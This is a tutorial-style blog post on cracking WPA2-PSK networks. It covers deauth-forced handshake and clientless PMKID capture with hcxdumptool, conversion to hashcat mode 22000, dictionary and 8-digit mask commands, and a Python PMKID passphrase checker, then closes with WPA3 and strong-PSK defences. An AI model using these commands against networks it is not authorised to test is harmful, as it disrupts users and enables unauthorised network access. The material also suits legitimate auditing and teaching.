Cracking WPA2: the PMKID attack and the 4-way handshake

Two ways into a WPA2 network: capture the EAPOL handshake or pull a clientless PMKID. How to produce 22000 format and crack it with hashcat, plus why WPA3 resists.

Published on 4 min read

WPA2-PSK cracking is an offline dictionary attack against the network passphrase. That is the entire shape of it. You do not break the crypto, you capture a piece of the authentication, take it home, and guess passphrases against it until one produces the right value. Everything else is logistics: how you get the capture, and how you turn it into something hashcat will eat.

There are two capture paths. Both end in the same 22000 hashline.

Path one: the 4-way handshake

When a client joins a WPA2 network, it performs a four-message EAPOL exchange with the access point to derive session keys from the pre-shared key. Capture those messages and you have what you need to attack the EAPOL handshake offline. The catch is timing: you only see the handshake when a client connects, and clients connect when they feel like it.

So you force it. Deauthenticate a connected client, the client reconnects automatically, and you grab the handshake on the way back in. With the hcxdumptool toolchain on a monitor-mode interface:

hcxdumptool -i wlan0 -w capture.pcapng --enable_status=1

hcxdumptool handles the association and deauthentication logic itself when you let it, capturing both PMKIDs and EAPOL frames into one pcapng. The deauth is the noisy part of this attack. It is active, it is detectable by a halfway decent WIDS, and it briefly knocks a real user offline. That is the tradeoff for getting a handshake on demand instead of waiting.

Path two: the clientless PMKID

The PMKID attack is the cleaner one. On many access points, the first message of the handshake (sent by the AP) contains a PMKID in its RSN information element, computed from the PMK, the AP MAC, and the client MAC. You can request association and harvest that PMKID without any client ever connecting, which is why it is called clientless. No deauth, no waiting for a victim, far quieter on the wire.

It does not always work. Some access points do not include the PMKID, and you fall back to the handshake. But when it does, you have everything you need from the AP alone. hcxdumptool collects PMKIDs in the same capture session, so in practice you run one tool and take whichever path the target gives you.

Producing the 22000 format

Raw pcapng is not a hashcat input. You convert it with hcxpcapngtool, which extracts both PMKIDs and EAPOL handshakes into the unified hashline:

hcxpcapngtool -o hash.22000 capture.pcapng

The output lines start with WPA*01* for PMKID and WPA*02* for EAPOL. Both are mode 22000. This unification is the important modern detail: hashcat used to split this into -m 2500 for EAPOL and -m 16800 for PMKID, and both are deprecated. One format, one mode, both attacks.

Cracking with hashcat -m 22000

Point hashcat at the hashline:

hashcat -m 22000 hash.22000 rockyou.txt

This is a dictionary attack and nothing more. You are guessing the passphrase. Everything from the wordlist and rules guide applies directly: rockyou for the first pass, curated lists after, rules to mutate, and a targeted list built from anything you know about the target (the company name, the cafe, the router's default SSID conventions).
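To make concrete what "verify a guess offline" means for the hashline format above, here is an added Python example (not the post's tooling and not hashcat) that parses a WPA*01* line and checks candidate passphrases against its PMKID using the 802.11i derivations the post describes. The SSID, MAC addresses, passphrase and wordlist are constructed sample values; a real hash.22000 from hcxpcapngtool has the same layout.

```python
import hashlib
import hmac
from typing import Optional

# IEEE 802.11i derivations: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes),
# PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC) truncated to 128 bits.
def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)

def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def parse_22000(line: str) -> dict:
    # Hashline layout: WPA*TYPE*PMKID_or_MIC*AP_MAC*STA_MAC*ESSID_HEX*ANONCE*EAPOL*MSGPAIR
    # For TYPE 01 (PMKID) the last three fields are empty, so the line ends in "***".
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] not in ("01", "02"):
        raise ValueError("not a hashcat 22000 hashline")
    return {
        "kind": "PMKID" if fields[1] == "01" else "EAPOL",
        "value": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]),
    }

def check_guess(entry: dict, passphrase: str) -> bool:
    # One offline verification: no packets, no AP, only PBKDF2 and one HMAC.
    if entry["kind"] != "PMKID":
        raise NotImplementedError("EAPOL lines need the PTK/MIC derivation, not shown here")
    pmk = derive_pmk(passphrase, entry["essid"])
    return hmac.compare_digest(derive_pmkid(pmk, entry["ap_mac"], entry["sta_mac"]), entry["value"])

def audit_wordlist(line: str, candidates: list) -> Optional[str]:
    # Same loop hashcat runs, minus the GPU: return the first candidate that matches, else None.
    entry = parse_22000(line)
    for cand in candidates:
        if check_guess(entry, cand):
            return cand
    return None

def build_pmkid_line(passphrase: str, ssid: bytes, ap_mac: bytes, sta_mac: bytes) -> str:
    # Constructed sample line in hcxpcapngtool's layout, built from a known passphrase.
    pmkid = derive_pmkid(derive_pmk(passphrase, ssid), ap_mac, sta_mac)
    return f"WPA*01*{pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.hex()}***"

# Constructed sample: a weak, wordlist-style PSK on a demo SSID with made-up MACs.
SAMPLE_LINE = build_pmkid_line("Summer2024!", b"HomeNet-demo",
                               bytes.fromhex("aabbccddee01"), bytes.fromhex("aabbccddee02"))

if __name__ == "__main__":
    print(audit_wordlist(SAMPLE_LINE, ["password", "Summer2023!", "Summer2024!"]))
```

Each check_guess call costs 4096 PBKDF2 iterations, which is why a random PSK well past 8 characters (not a wordlist entry) is the defence: the per-guess cost stays fixed, so only the keyspace can make the loop infeasible.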

The 8-character minimum on WPA2 is the lever that makes pure brute force occasionally viable. A passphrase that is exactly 8 characters has a bounded keyspace, so a mask attack can in principle exhaust it:

hashcat -m 22000 -a 3 hash.22000 ?d?d?d?d?d?d?d?d

That 8-digit mask (think phone numbers, dates spelled as digits) is a genuinely common router default and falls fast. A full 8-character mask across uppercase, lowercase, digits and symbols is a different story: it is technically finite but expensive enough that you would rather have a good wordlist. The practical reality is that most WPA2 passphrases that fall, fall to dictionaries and targeted lists, not to brute force.

Why WPA3 ends this

The reason all of the above works is that WPA2-PSK lets you verify a passphrase guess offline against a captured value. WPA3 closes that door. It uses SAE, the Dragonfly handshake, which is a password-authenticated key exchange. Capturing the exchange gives an attacker nothing to grind offline, because each guess requires a fresh interaction with the access point. No offline dictionary attack, no PMKID to harvest. The entire economy of WPA2 cracking does not exist against SAE.

The defender's move

If you run WPA2 and cannot move to WPA3 yet, the fix is the same as every other slow-hash story: make the passphrase un-guessable. A long, random PSK (not a word, not a phrase a human chose, a genuinely random string well past the 8-character floor) defeats dictionaries and pushes brute force into geological timescales. For anything beyond a home network, drop the shared key entirely and use 802.1X with per-user credentials, so there is no single PSK to capture and crack in the first place. And where you can, move to WPA3 and stop having this conversation.